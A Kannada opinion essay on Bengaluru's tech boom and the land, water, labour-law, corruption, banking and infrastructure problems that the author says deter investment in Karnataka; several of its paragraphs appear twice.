ಮೊದಲು ಫ್ಲಿಪ್‍ಕಾರ್ಟ್ ಮತ್ತು ನಂತರ ಅಮೆಝಾನ್ ಬೆಂಗಳೂರಿನಲ್ಲಿ ನೆಲೆಯೂರಿದವು. ಈ ದೈತ್ಯ ಕಂಪನಿಗಳ ಜೊತೆಗೆ ಓಲಾ, ಸ್ವಿಗ್ಗಿ, ಮೇಕ್ ಮೈ ಟ್ರಿಪ್, ಮೇಕ್ ಮೈ ಶೋ, ಕ್ಯಾರಟ್ ಲೇನ್, ಬ್ಲೂ ಡೈಮಂಡ್ ಮತ್ತು ಹಲವಾರು ಆನ್‍ಲೈನ್ ಮಾರ್ಕೆಟಿಂಗ್ ಕಂಪನಿಗಳು ನೆಲೆನಿಂತವು.

ಭೂಮಿಯ ದರ ಹತ್ತಾರು ಪಟ್ಟು ಹೆಚ್ಚಳಗೊಂಡರೆ ಬೆಂಗಳೂರಿನ ವಾಹನ ಸಂಚಾರ, ರಸ್ತೆಗಳು, ನೀರು ಮತ್ತು ಒಳಚರಂಡಿ, ಒಣತ್ಯಾಜ್ಯ ವಿಲೇವಾರಿ ಮತ್ತಿತರ ಹಲವಾರು ‘ಕಿತ್ತು ತಿನ್ನುವ’ ಬವಣೆಗಳು ಬೆಂಗಳೂರನ್ನು ಕಾಡಿದವು. ಈ ಎಲ್ಲಾ ಸಮಸ್ಯೆಗಳಿಗೆ ನಿಧಾನವಾಗಿ ಪರಿಹಾರ ಕಂಡುಹಿಡಿಯಲು ಪ್ರಯತ್ನಿಸಲಾಗಿದೆಯಾದರೂ ಸಮಸ್ಯೆಯ ಗಂಭೀರತೆ ಮತ್ತಷ್ಟು ಹೆಚ್ಚುತ್ತಾ ಈಗಲೂ ಇವು ಕಗ್ಗಂಟಾಗಿಯೇ ಉಳಿದಿವೆ. ಈ ಸಮಸ್ಯೆಗಳನ್ನು ಪರಿಹರಿಸುವುದಕ್ಕೆ ‘ರಾಕೆಟ್ ಸೈನ್ಸ್’ ಅಗತ್ಯವಿಲ್ಲ. ಆದರೆ ಇದಕ್ಕೆ ಬೇಕಿರುವ ರಾಜಕೀಯ ಇಚ್ಛಾಶಕ್ತಿ ಹಾಗೂ ಮುಂದಾಳತ್ವ ಕರ್ನಾಟಕದಲ್ಲಿ ಕಳೆದೆರೆಡು ದಶಕಗಳಲ್ಲಿ ದೊರೆತಿಲ್ಲ.

ಬೆಂಗಳೂರಿನ ಟೆಕ್ ಸಾರ್ವಭೌಮತ್ವ ಕೇವಲ ತಂತ್ರಜ್ಞಾನಕ್ಕೆ ಸೀಮಿತಗೊಂಡಿಲ್ಲ. ಇದು ಬಯೋ ಟೆಕ್ನಾಲಜಿ ಹಾಗೂ ವೈಜ್ಞಾನಿಕ ಸಂಶೋಧನೆಗೂ ಪಸರಿಸಿದೆ. ಹಿಮಾಲಯ, ಬಯೋ-ಕಾನ್ ನಂತಹ ಸಂಸ್ಥೆಗಳ ಜೊತೆಗೆ ಶುದ್ಧ ಸಂಶೋಧನೆಯ ಜಿಇ-ಐಟಿಸಿ ಮತ್ತಿತರ ಆರ್‍ಅಂಡ್‍ಡಿ ಕಂಪನಿಗಳು ಕೂಡಾ ಸಾಕಷ್ಟು ಬೇರೂರಿವೆ. ಡಿಫೆನ್ಸ್ ಮತ್ತು ಏರೋನಾಟಿಕಲ್ ಎಂಜಿನಿಯರಿಂಗ್‍ನಲ್ಲಿ ಕೂಡಾ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಅತ್ಯುತ್ಕೃಷ್ಟ ಸಂಸ್ಥೆಗಳು ತಲೆಯೆತ್ತಿವೆ.

2012ರ ನಂತರದಲ್ಲಿ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಚಮತ್ಕಾರವೇ ನಡೆಯಿತು. ಅಂದಿನವರೆಗೆ ಕೇವಲ ವಿದೇಶಿ ಸಂಸ್ಥೆಗಳಿಗೆ ಟೆಕ್‍ಸೇವೆ ನೀಡುತ್ತಿದ್ದ ಕಂಪನಿಗಳು ಹಳೆಯ ಸುದ್ದಿಗಳಾದವು. ದೇಶಿ ಆನ್‍ಲೈನ್ ಮಾರುಕಟ್ಟೆಯ ಬೃಹತ್ ಅವಕಾಶವೊಂದು ಬೆಂಗಳೂರಿನಲ್ಲಿ ತನ್ನ ಕೇಂದ್ರಸ್ಥಾನ ಕಂಡುಕೊಂಡಿತು. ಮೊದಲು ಫ್ಲಿಪ್‍ಕಾರ್ಟ್ ಮತ್ತು ನಂತರ ಅಮೆಝಾನ್ ಬೆಂಗಳೂರಿನಲ್ಲಿ ನೆಲೆಯೂರಿದವು. ಈ ದೈತ್ಯ ಕಂಪನಿಗಳ ಜೊತೆಗೆ ಓಲಾ, ಸ್ವಿಗ್ಗಿ, ಮೇಕ್ ಮೈ ಟ್ರಿಪ್, ಮೇಕ್ ಮೈ ಶೋ, ಕ್ಯಾರಟ್ ಲೇನ್, ಬ್ಲೂ ಡೈಮಂಡ್ ಮತ್ತು ಹಲವಾರು ಆನ್‍ಲೈನ್ ಮಾರ್ಕೆಟಿಂಗ್ ಕಂಪನಿಗಳು ನೆಲೆನಿಂತವು. ಇವು ಇಂಟರ್‍ನೆಟ್ ವ್ಯಾಪಾರದ ಒಂದು ಮುಂದುವರೆದ ಅಂಗವಾಗುವುದರ ಬದಲಿಗೆ ಕೇವಲ ಇಂಟರ್‍ನೆಟ್‍ನಲ್ಲಿಯೇ ಸಂಪೂರ್ಣ ವ್ಯವಹಾರ ಬೆಳೆಸುವ ‘ಇಂಟರ್‍ನೆಟ್ ಆಫ್ ಥಿಂಗ್ಸ್’ ಅಭಿವೃದ್ಧಿ ಮಾಡಿಕೊಂಡಿವೆ.

ಈ ‘ಇಂಟರ್‍ನೆಟ್ ಆಫ್ ಥಿಂಗ್ಸ್’ ವಾಣಿಜ್ಯಕ್ಕೆ ಪೂರಕವಾಗಿ ಹಲವಾರು ಕೈಗಾರಿಕೆ ಮತ್ತು ಸೇವಾ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಹೂಡಿಕೆ ಮಾಡುವ ಅವಶ್ಯಕತೆಯಿದೆ. ಆದರೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಒಟ್ಟಾರೆ ಹೂಡಿಕೆಗೆ ಪೂರಕವಾದ ವಾತಾವರಣವೇ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆ. ಕೈಗಾರಿಕೆಗಳಿಗಂತೂ ಕರ್ನಾಟಕದಿಂದ ದೂರ ಓಡುವ ಅನಿವಾರ್ಯತೆ ಬರುತ್ತಿದೆ. ಇದಕ್ಕೆ ಕಾರಣಗಳಾದರೂ ಏನು..?

ಬೆಂಗಳೂರಿನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿರುವ ನುರಿತ ಮತ್ತು ಮುಕ್ತಮನಸ್ಸಿನ ಮಾನವ ಸಂಪನ್ಮೂಲವನ್ನು ಬಳಸಿಕೊಂಡು ಈ ಸಂಸ್ಥೆಗಳು ಬೆಂಗಳೂರಿನಲ್ಲಿ ಬೇರೂರಲು ಪ್ರಯತ್ನಿಸಿವೆ. ಇದೇ ಸೀಮಿತ ಸಂಪನ್ಮೂಲಕ್ಕೆ ಸಹಸ್ರಾರು ‘ಸ್ಟಾರ್ಟ್ ಅಪ್’ಗಳೂ ಗಾಳ ಹಾಕಿ ಕೂತಿವೆ. ಈ ಅವಕಾಶಗಳನ್ನು ಬಳಸಿಕೊಳ್ಳಲು ದೇಶದಾದ್ಯಂತ ಎಂಜಿನಿಯರ್‍ಗಳು ಮತ್ತು ಪದವೀಧರರು ಬೆಂಗಳೂರಿಗೆ ಗುಳೆ ಹೊರಟು ಬಂದಿದ್ದಾರೆ. ಇವರೆಲ್ಲರಿಗೆ ಕೆಲಸ ಕೊಡುವ ಸಾಮಥ್ರ್ಯ ಬೆಂಗಳೂರಿನ ಕಂಪನಿಗಳಿಗಿದೆ. ಇವರೆಲ್ಲರ ಸಾಮಥ್ರ್ಯ ಬಳಸಿಕೊಂಡು ಇನ್ನಷ್ಟು ಎತ್ತರಕ್ಕೆ ಬೆಳೆಯಲು ಈ ಕಂಪನಿಗಳು ತುದಿಗಾಲಲ್ಲಿ ನಿಂತಿವೆ. ಆದರೆ ಬೆಂಗಳೂರಿನ ಪರಿಸರದ ಮೂಲಭೂತ ಸಮಸ್ಯೆಗಳು ಇದನ್ನು ತಡೆದು ಹಿಡಿದಿವೆ.

ಬೆಂಗಳೂರಿಗೆ ದಂಡುದಂಡಾಗಿ ವಲಸೆ ಬರುತ್ತಿರುವ ಈ ನವನವೀನ ಇಂಟರ್‍ನೆಟ್ ಸೇವಾಕ್ಷೇತ್ರಕ್ಕೆ ಪೂರಕವಾಗಿ ಹಲವಾರು ವಾಣಿಜ್ಯ, ವ್ಯಾಪಾರ, ಸಂಚಾರ, ಸೇವಾಕ್ಷೇತ್ರಗಳು ಬೆಳೆಯಬಹುದು. ಬೆಂಗಳೂರಿನ ಸುತ್ತಮುತ್ತ ಅಗಾಧ ಪ್ರಮಾಣದ ಉಗ್ರಾಣ ವ್ಯವಸ್ಥೆಯ ಕೊರತೆಯಿದೆ. ಈ ‘ಇಂಟರ್‍ನೆಟ್ ಆಫ್ ಥಿಂಗ್ಸ್’ ವಾಣಿಜ್ಯಕ್ಕೆ ಪೂರಕವಾಗಿ ಹಲವಾರು ಕೈಗಾರಿಕೆ ಮತ್ತು ಸೇವಾ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಹೂಡಿಕೆ ಮಾಡುವ ಅವಶ್ಯಕತೆಯಿದೆ. ಆದರೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಒಟ್ಟಾರೆ ಹೂಡಿಕೆಗೆ ಪೂರಕವಾದ ವಾತಾವರಣವೇ ಕಣ್ಮರೆಯಾಗುತ್ತಿದೆ. ಕೈಗಾರಿಕೆಗಳಿಗಂತೂ ಕರ್ನಾಟಕದಿಂದ ದೂರ ಓಡುವ ಅನಿವಾರ್ಯತೆ ಬರುತ್ತಿದೆ. ಇದಕ್ಕೆ ಕಾರಣಗಳಾದರೂ ಏನು..? ಕರ್ನಾಟಕದಲ್ಲಿ ಕೃಷಿ, ಕೈಗಾರಿಕೆ ಮತ್ತು ಸೇವಾಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಹೂಡಿಕೆ ಮಾಡಲು ಹಿಂಜರಿಯಬೇಕಾದ ಕಾರಣಗಳಾವುವು..?

• ಬೆಂಗಳೂರಿಗೆ ತಂಡೋಪತಂಡವಾಗಿ ಫಾರ್ಚೂನ್-500 ಕಂಪನಿಗಳು ಬರಲು ತಯಾರಿವೆ. ಆದರೆ ಈ ಕಂಪನಿಗಳಿಗೆ ತಮ್ಮ ಕ್ಯಾಂಪಸ್ ತೆರೆಯಲು ಬೆಂಗಳೂರಿನ ಸುತ್ತಮುತ್ತಲ 50 ಕಿಮೀ ರೇಡಿಯಸ್ ಸುತ್ತಳತೆಯಲ್ಲಿ ಯಾವುದೇ ಜಮೀನು ಲಭ್ಯವಿಲ್ಲ. ಈ ತೆರನಾದ ಕೈಗಾರಿಕೆ ಬಳಕೆಗೆ ಜಮೀನು ಕೊಡಮಾಡಬೇಕಿರುವ ಕರ್ನಾಟಕ ಕೈಗಾರಿಕಾ ಪ್ರದೇಶಾಭಿವೃದ್ಧಿ ಮಂಡಳಿಯ ಬಳಿ ನೀವು ಹೋಗಿ ಕೇಳಿ. ಅಲ್ಲಿನ ಘನಂದಾರಿ ಅಧಿಕಾರಿಗಳು ನಿಮಗೆ ಧಾರವಾಡದಲ್ಲಿಯೋ ರಾಯಚೂರಿನಲ್ಲಿಯೋ ಜಮೀನು ತೋರಿಸುತ್ತಾರೆ. ತಮ್ಮ ಸಂಸ್ಥೆಯ ಆದ್ಯತೆ ಕೇವಲ ಹಿಂದುಳಿದ ಪ್ರದೇಶಗಳಲ್ಲಿ ಕೈಗಾರಿಕೆ ಬೆಳೆಸಬೇಕೆಂಬುದು ಎಂದು ನಿಮಗೇ ಬುದ್ಧಿ ಹೇಳುತ್ತಾರೆ. ಬೆಂಗಳೂರಿನ ಸುತ್ತಮುತ್ತಲ ಪ್ರದೇಶದಲ್ಲಿ ಯಾವುದೇ ಜಮೀನು ವಶಪಡಿಸಿಕೊಳ್ಳುವುದು ಅಸಾಧ್ಯವಾಗಿದೆಯೆಂದು ಕೈ ಚೆಲ್ಲುತ್ತಾರೆ.

ಸರ್ಕಾರದ ಯಾವುದೋ ಕಡತದಲ್ಲಿ ಹುದುಗಿರುವ ಯಾವುದೋ ಕಾನೂನು ನಿಯಮವೊಂದು ನಿಮ್ಮ ಭೂಪರಿವರ್ತನೆಯ ಅರ್ಜಿಯನ್ನು ಮನ್ನಿಸದಿರಲು ಕಾರಣವೊಂದನ್ನು ನೀಡುತ್ತದೆ. ರಾಜ್ಯದ ಎಲ್ಲಾ ಸರ್ಕಾರಗಳು ಝೋನಿಂಗ್ ನಿಯಮಗಳನ್ನು ತಮ್ಮ ತಿಜೋರಿ ತುಂಬಿಸಿಕೊಳ್ಳಲು ಮಾತ್ರಕ್ಕೆ ಬಳಸಿವೆ.

ಈ ಗೋಳು ಕೇವಲ ಬೆಂಗಳೂರಿನಲ್ಲಿ ಹೂಡಿಕೆ ಮಾಡಬಯಸುವವರದ್ದು ಮಾತ್ರವಲ್ಲ. ಕೃಷಿ ಜಮೀನನ್ನು ಗೃಹಬಳಕೆಗೆ ಹಾಗೂ ವಾಣಿಜ್ಯ ಬಳಕೆಗೆ ಅನುಮೋದನೆ ಕೊಡುವ ಪ್ರಕ್ರಿಯೆ ಸಂಪೂರ್ಣ ಕೆಟ್ಟು ಹೋಗಿದೆ. ಒಂದು ಎಕರೆ ಜಮೀನು ಭೂಪರಿವರ್ತನೆ ಮಾಡಿಕೊಳ್ಳಲು ಹತ್ತಿಪ್ಪತ್ತು ಕಛೇರಿಗಳ ಮೆಟ್ಟಿಲು ಸವೆಸಬೇಕಾಗುತ್ತದೆ. ಇದನ್ನು ಮಾಡಿಯೂ ನಿಮ್ಮ ಕೆಲಸ ಕೈಗೂಡದಿರಬಹುದು. ಸರ್ಕಾರದ ಯಾವುದೋ ಕಡತದಲ್ಲಿ ಹುದುಗಿರುವ ಯಾವುದೋ ಕಾನೂನು ನಿಯಮವೊಂದು ನಿಮ್ಮ ಭೂಪರಿವರ್ತನೆಯ ಅರ್ಜಿಯನ್ನು ಮನ್ನಿಸದಿರಲು ಕಾರಣವೊಂದನ್ನು ನೀಡುತ್ತದೆ. ರಾಜ್ಯದ ಎಲ್ಲಾ ಸರ್ಕಾರಗಳು ಝೋನಿಂಗ್ ನಿಯಮಗಳನ್ನು ತಮ್ಮ ತಿಜೋರಿ ತುಂಬಿಸಿಕೊಳ್ಳಲು ಮಾತ್ರಕ್ಕೆ ಬಳಸಿವೆ. ಈ ಝೋನಿಂಗ್ ಕೆಲಸದಲ್ಲಿ ಯಾವುದೇ ಪಾರದರ್ಶಕತೆ ಅಥವಾ ವೃತ್ತಿಪರತೆ ಕಾಣುವುದಿಲ್ಲ.

ಒಟ್ಟಾರೆಯಾಗಿ ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯೋಗ ಸೃಷ್ಟಿ ಹಾಗೂ ಹೂಡಿಕೆಯ ಅವಕಾಶಗಳನ್ನು ಸೀಮಿತಗೊಳಿಸುವಲ್ಲಿ ಸರ್ಕಾರಗಳು ಸೂಕ್ತ ಜಮೀನು ಒದಗಿಸದಿರುವುದೇ ಮುಖ್ಯ ಕಾರಣವಾಗಿದೆ. ಓಬೀರಾಯನ ಕಾಲದ ಕಾನೂನು ನಿಯಮಗಳನ್ನು ಇಂದಿನ ಡಿಜಿಟಲ್ ಯುಗಕ್ಕೆ ತಡೆಗೋಡೆಯಾಗಿ ಹಿಡಿಯಲಾಗುತ್ತಿದೆ.

• ಕನಾಟಕದಲ್ಲಿದ್ದಷ್ಟು ಯಥೇಚ್ಛ ನೀರು ಲಭ್ಯತೆ ಬೇರಾವುದೇ ರಾಜ್ಯಗಳಲ್ಲಿ ಇರಲಾರದು. ಕೃಷ್ಣೆ, ಮಲಪ್ರಭಾ, ಭೀಮ, ತುಂಗಭದ್ರಾ, ಹೇಮಾವತಿ ಮತ್ತು ಕಾವೇರಿಗಳಿಂದ ಕರ್ನಾಟಕದಲ್ಲಿ ಅವಶ್ಯ ನೀರು ನದಿಮೂಲಗಳಲ್ಲಿಯೇ ಲಭ್ಯವಿದೆ. ಪಶ್ಚಿಮಕ್ಕೆ ಹರಿಯುವ ಕಾಳಿ, ನೇತ್ರಾವತಿ, ಮತ್ತಿತರ ನದಿನೀರನ್ನು ಸೀಮಿತ ಪ್ರಮಾಣದಲ್ಲಿ ಪೂರ್ವದಿಕ್ಕಿಗೂ ಹರಿಸಿ ಬಳಸಿಕೊಳ್ಳಬಹುದು. ಕೃಷ್ಣಾ ನದಿಯ ನೀರಿನ ಪಾಲನ್ನು ನಾವಿನ್ನೂ ಬಳಸಿಕೊಳ್ಳಲಾಗಿಲ್ಲ.

ಕರ್ನಾಟಕದ ನದಿಗಳು ಮತ್ತು ಜಲಾಶಯಗಳು ರಾಜ್ಯದ ಹಳ್ಳಿ-ನಗರಗಳಿಗೆ ಕುಡಿಯುವ ನೀರನ್ನು ಒದಗಿಸಬಲ್ಲುವು. ಆದರೆ ನಾವು ಈ ಅಮೂಲ್ಯ ನೀರನ್ನು ಕಬ್ಬು ಬೆಳೆಯಲು ಬಳಸುತ್ತಿದ್ದೇವೆ. ನಮ್ಮ ಪಟ್ಟಣ-ನಗರಗಳನ್ನು ದಾಹದಿಂದ ಒಣಗಲು ಬಿಟ್ಟು ಭತ್ತದ ಗದ್ದೆಯಲ್ಲಿ ನೀರು ನಿಲ್ಲಿಸುವುದು ನಮ್ಮ ತುರ್ತು ಅಗತ್ಯ ಎಂದು ಕನವರಿಸುತ್ತಿದ್ದೇವೆ. ನೀರಾವರಿಗೆ ಪೋಲಾಗುವ ನದಿನೀರನ್ನು ಕುಡಿಯುವ ನೀರಿನ ಯೋಜನೆಗಳಗೇ ಬಿಟ್ಟುಕೊಡದ ನಾವು ಇನ್ನು ಕೈಗಾರಿಕೆಗಳಿಗೆ ಎಲ್ಲಿ ನೀರು ಕೊಡುವ ಮನಸ್ಸುಳ್ಳವರಾಗಿದ್ದೇವೆ..? ನೀರು ಬಯಸುವ ಯಾವುದೇ ಕೈಗಾರಿಕೆ ಹೊಸದಾಗಿ ಕರ್ನಾಟಕಕ್ಕೆ ಬರುವ ಸಾಧ್ಯತೆಯಿಲ್ಲ. ಅತ್ಯಂತ ಕಡಿಮೆ ನೀರು ಬಯಸುವ ಸೇವಾಕ್ಷೇತ್ರದ ನೀರಿನ ಕೊರತೆ ಹಿಂಗಿಸಲೂ ನಾವು ಅಸಮರ್ಥರಾಗಿದ್ದೇವೆ.

ವರ್ಷದಿಂದ ವರ್ಷಕ್ಕೆ ನಷ್ಟ ಅನುಭವಿಸುತ್ತಿದ್ದರೂ ಕೈಗಾರಿಕೆಗಳು ತಮ್ಮ ಉತ್ಪಾದನೆ ನಿಲ್ಲಿಸಿ ಉಳಿದಿರುವ ಕ್ಯಾಪಿಟಲ್ ಸ್ವತ್ತುಗಳನ್ನು ಮಾರಿ ನಷ್ಟ ತಗ್ಗಿಸುವಂತಿಲ್ಲ. ಇದಕ್ಕೆ ನಮ್ಮ ಕಾರ್ಮಿಕ ಕಾನೂನು ಅಡ್ಡಿ ಒಡ್ಡಿದೆ. ಕಿಡಿಗೇಡಿ ಕಾರ್ಮಿಕನೊಬ್ಬನ ದೂರಿಗೆ ಕಂಪನಿಯ ಮಾಲೀಕನನ್ನು ಕಟಕಟೆಯಲ್ಲಿ ನಿಲ್ಲಿಸಿ ಅವಮಾನಿಸಲಾಗುತ್ತಿದೆ.

• ನಮ್ಮ ಕಾರ್ಮಿಕ ನೀತಿಯನ್ನು ಸಹಾ ನಾವು ಬದಲಿಸುವ ಗೋಜಿಗೆ ಹೋಗಿಲ್ಲ. ಇಂಟರ್‍ನೆಟ್ ಮುಖಾಂತರವೇ ನಮ್ಮ ಕಂಪನಿಗಳು ವಿಶ್ವದ ಕಂಪ್ಯೂಟರ್ ಸಿಸ್ಟಮ್ಸ್‍ಗಳ 24*7 ಜವಾಬ್ದಾರಿ ಹೊತ್ತಿವೆ. ಆದರೆ ನಮ್ಮ ಕಾರ್ಮಿಕ ನೀತಿ ರಾತ್ರಿ ಪಾಳಿಯ ಕೆಲಸದ ಜರೂರತೆ ಅರ್ಥ ಮಾಡಿಕೊಂಡಿಲ್ಲ. ಕನಿಷ್ಠ ವೇತನ ಜಾರಿ ಮಾಡುವಲ್ಲಿ ಕರ್ನಾಟಕದ ಕೃಷಿ ಕ್ಷೇತ್ರ ಲಾಭ ಗಳಿಸುವ ಸಾಧ್ಯತೆಯಿಂದ ಬಹುದೂರ ಸಾಗಿ ಗ್ಯಾರಂಟಿ ನಷ್ಟದ ಹೊಸ್ತಿಲಲ್ಲಿದೆ. ವರ್ಷದಿಂದ ವರ್ಷಕ್ಕೆ ನಷ್ಟ ಅನುಭವಿಸುತ್ತಿದ್ದರೂ ಕೈಗಾರಿಕೆಗಳು ತಮ್ಮ ಉತ್ಪಾದನೆ ನಿಲ್ಲಿಸಿ ಉಳಿದಿರುವ ಕ್ಯಾಪಿಟಲ್ ಸ್ವತ್ತುಗಳನ್ನು ಮಾರಿ ನಷ್ಟ ತಗ್ಗಿಸುವಂತಿಲ್ಲ. ಇದಕ್ಕೆ ನಮ್ಮ ಕಾರ್ಮಿಕ ಕಾನೂನು ಅಡ್ಡಿ ಒಡ್ಡಿದೆ. ಕಿಡಿಗೇಡಿ ಕಾರ್ಮಿಕನೊಬ್ಬನ ದೂರಿಗೆ ಕಂಪನಿಯ ಮಾಲೀಕನನ್ನು ಕಟಕಟೆಯಲ್ಲಿ ನಿಲ್ಲಿಸಿ ಅವಮಾನಿಸಲಾಗುತ್ತಿದೆ.

• ಯಾವುದೇ ಉದ್ದಿಮೆ ಮಾಡಬೇಕೆಂದರೆ ಈಗಲೂ ನಿಮಗೆ ಕನಿಷ್ಠ 25 ಇಲಾಖೆ/ಕಾನೂನುಗಳ ಅಡಿ ಅನುಮತಿ ಪಡೆಯಬೇಕಿದೆ. ಈ ಕಛೇರಿಗಳ ಅಧಿಕಾರಿಗಳಿಗೆ ಕೈಬೆಚ್ಚಗೆ ಮಾಡಿ ನೀವು ಮುಂದುವರೆಯುವ ಹೊತ್ತಿಗೆ ಉದ್ಯಮ ಮಾಡಬೇಕೆನ್ನುವ ನಿಮ್ಮ ಕಿಚ್ಚು ಆರಿ ತಣ್ಣಗಾಗಿರುತ್ತದೆ. ಮೇಜಿನಿಂದ ಮೇಜಿಗೆ ಹಾಗೂ ಕಛೇರಿಯಿಂದ ಕಛೇರಿಗೆ ಅಲೆದು ಅನುಮತಿ-ಪರವಾನಗಿ-ನಿರಾಕ್ಷೇಪಣಾ ಪತ್ರ ಪಡೆಯಲು ನೀವು ಒಂದು ಸಣ್ಣ ಸೈನ್ಯವನ್ನೇ ಸಾಕಬೇಕಾದ ಅಗತ್ಯವಿದೆ. ಈ ಸೈನ್ಯಕ್ಕೆ ಬೇಕಿರುವ ಸರಂಜಾಮು ವಹಿಸುವಲ್ಲಿಗೆ ನಿಮ್ಮ ಹೂಡಿಕೆಯ ಒಟ್ಟು ಬಜೆಟ್‍ನ ಶೇಕಡಾ 10 ರಿಂದ 25 ರಷ್ಟು ಹಣ ಖರ್ಚಾಗುತ್ತದೆ. ಹಣ ಕೊಡಲು ನೀವು ತಯಾರಾದರೂ ಯಾರಾದರೂ ಒಬ್ಬ ‘ಪ್ರಾಮಾಣಿಕ’ ಅಧಿಕಾರಿ ಯಾವುದಾದರೊಂದು ಕಾನೂನು ಪ್ರತಿಯನ್ನು ನಿಮ್ಮ ಮುಖದ ಮೇಲೆಸೆದು ನಿಮ್ಮ ವಿಸ್ತೃತ ಯೋಜನಾ ವರದಿಯನ್ನು ಹರಿದೆಸೆಯುವಂತೆ ನಿಮ್ಮನ್ನೇ ಹತಾಶರಾಗಿ ಮಾಡುತ್ತಾನೆ.

ಕಳೆದ ಹದಿನೈದು ವರ್ಷಗಳಿಂದ (2004 ರಿಂದ ಇಲ್ಲಿಯವರೆಗೆ) ಈ ಭ್ರಷ್ಟಾಚಾರದ ಪೆಡಂಬೂತ ಕರ್ನಾಟಕದ ನರನಾಡಿಗಳನ್ನು ಹಿಂಡಿ ಹಿಚುಕುತ್ತಿದೆ. ಯಾವಾಗ ಈ ಅನಿಷ್ಟದಿಂದ ಪಾರಾಗುತ್ತೇವೆಯೋ ಎಂದು ಕನ್ನಡಿಗರು ಪರಿತಪಿಸುವಂತಾಗಿದೆ.

• ಸರ್ಕಾರಗಳ ಭ್ರಷ್ಟತೆಯ ಬಗ್ಗೆ ಹೇಳಿದಷ್ಟೂ ಕಡಿಮೆಯೇ. ಸರ್ಕಾರದ ಯಾವುದೇ ಮಾಮೂಲಿ ಕೆಲಸಕ್ಕೂ ತಮ್ಮ ಅಪ್ಪನ ಗಂಟಿನಿಂದ ಏನನ್ನೋ ಕಿತ್ತು ಕೊಡುವವರಂತೆ ಅಧಿಕಾರಿಗಳು ತಡೆ ಒಡ್ಡುತ್ತಾರೆ. ಕಳೆದ ಹದಿನೈದು ವರ್ಷಗಳಿಂದ (2004 ರಿಂದ ಇಲ್ಲಿಯವರೆಗೆ) ಈ ಭ್ರಷ್ಟಾಚಾರದ ಪೆಡಂಬೂತ ಕರ್ನಾಟಕದ ನರನಾಡಿಗಳನ್ನು ಹಿಂಡಿ ಹಿಚುಕುತ್ತಿದೆ. ಯಾವಾಗ ಈ ಅನಿಷ್ಟದಿಂದ ಪಾರಾಗುತ್ತೇವೆಯೋ ಎಂದು ಕನ್ನಡಿಗರು ಪರಿತಪಿಸುವಂತಾಗಿದೆ.

• ಬ್ಯಾಂಕುಗಳ ಋಣಾತ್ಮಕ ಧೋರಣೆ ಕೇವಲ ಕರ್ನಾಟಕಕ್ಕೆ ಮೀಸಲು ಅಲ್ಲವಾದರೂ 2014 ರಿಂದ ಇತ್ತೀಚಿನ ಐದು ವರ್ಷಗಳಲ್ಲಿ ಯಾವುದೇ ಸಾಲ ಪಡೆಯದಂತಾಗಿದೆ. ಸಾಲಕ್ಕೆ ಸಲ್ಲಿಸಲಾದ ವಾಣಿಜ್ಯ ಪ್ರಸ್ತಾಪವನ್ನು ಅದರ ಅರ್ಹತೆಯ ಮೇಲೆ ಪರಿಶೀಲಿಸುವ ಸಾಮಥ್ರ್ಯವನ್ನೇ ಬ್ಯಾಂಕುಗಳು ಕಳೆದುಕೊಂಡಿವೆ. ಮೊದಲಿನಂತೆ ಸಾಲದ ಶೇಕಡಾ 10 ರಷ್ಟು ‘ಮಾಮೂಲಿ’ ಪಡೆದು ಸಾಲ ಮಂಜೂರು ಮಾಡುವ ಸುಲಭ ವ್ಯವಸ್ಥೆ ಇಂದು ಸಿಬಿಐ ಭಯಕ್ಕೆ ನಿಂತುಹೋಗಿದೆ. ಆದರೆ ಅರ್ಹತೆಯ ಮೇಲೆ ಸಾಲ ನೀಡುವ ಪಾರದರ್ಶಕ ವ್ಯವಸ್ಥೆ ಇನ್ನೂ ಬಂದಿಲ್ಲ. ಹೀಗೆ ಹೂಡಿಕೆದಾರ ತ್ರಿಶಂಕು ಪಾತಾಳದಲ್ಲಿ ನರಳುತ್ತಿದ್ದಾನೆ.

• ಕರ್ನಾಟಕದ ಉಳಿಕೆಯ ಮೂಲಸೌಲಭ್ಯಗಳು, ರಸ್ತೆ, ರೈಲುಜಾಲ ಮತ್ತು ಜೀವನದ ಗುಣಮಟ್ಟ ಉದ್ಯಮದ ಮೇಲೆ ಪರಿಣಾಮ ಬೀರಿವೆ. ಬೆಂಗಳೂರಿನಲ್ಲಿ ಪ್ರತಿದಿನ ನಾಲ್ಕು ಗಂಟೆ ಬಸ್ಸು-ಕಾರುಗಳಲ್ಲಿ ಪ್ರಯಾಣ ಮಾಡಿ ಬಳಲಿದ ಜೀವವೊಂದು ಹೊಸ ಉದ್ದಿಮೆ ಮಾಡುವ ಬಗ್ಗೆ ಯೋಚಿಸುವುದಾದರೂ ಹೇಗೆ..?
ಇವುಗಳನ್ನು ನಿವಾರಿಸದೆ ಕರ್ನಾಟಕದಲ್ಲಿ ಉದ್ಯಮಶೀಲತೆ ಬೆಳೆಯಲಾಗದು. ಈ ವಿಷಯಗಳ ಬಗ್ಗೆ ಕರ್ನಾಟಕದ ಜನರು ದಿವ್ಯ ನಿರ್ಲಕ್ಷ್ಯ ವಹಿಸಿದ್ದಾರೆ. ಈ ವಿಷಯದ ಬಗ್ಗೆ ಅಗತ್ಯವಿರುವ ಮಾಹಿತಿ ಹಾಗೂ ತಿಳಿವಳಿಕೆಯ ಕೊರತೆಯೂ ಇದೆ. ಕನ್ನಡ ಭಾಷೆ ಬೆಳೆಯಬೇಕೆಂದರೆ ಕನ್ನಡಿಗರು ಉದ್ಯಮಿಗಳಾಗಬೇಕು ಮತ್ತು ಶ್ರೀಮಂತರಾಗಬೇಕು. ಇದಕ್ಕೆ ಪೂರಕ ವಾತಾವರಣ ನಿರ್ಮಿಸದೆ ಹೋದರೆ ಕನ್ನಡಿಗರು ಎಂದಿನಂತೆ ಬಡ ಬೋರೇಗೌಡನಾಗಿಯೇ ಇರಬೇಕಾಗುತ್ತದೆ.

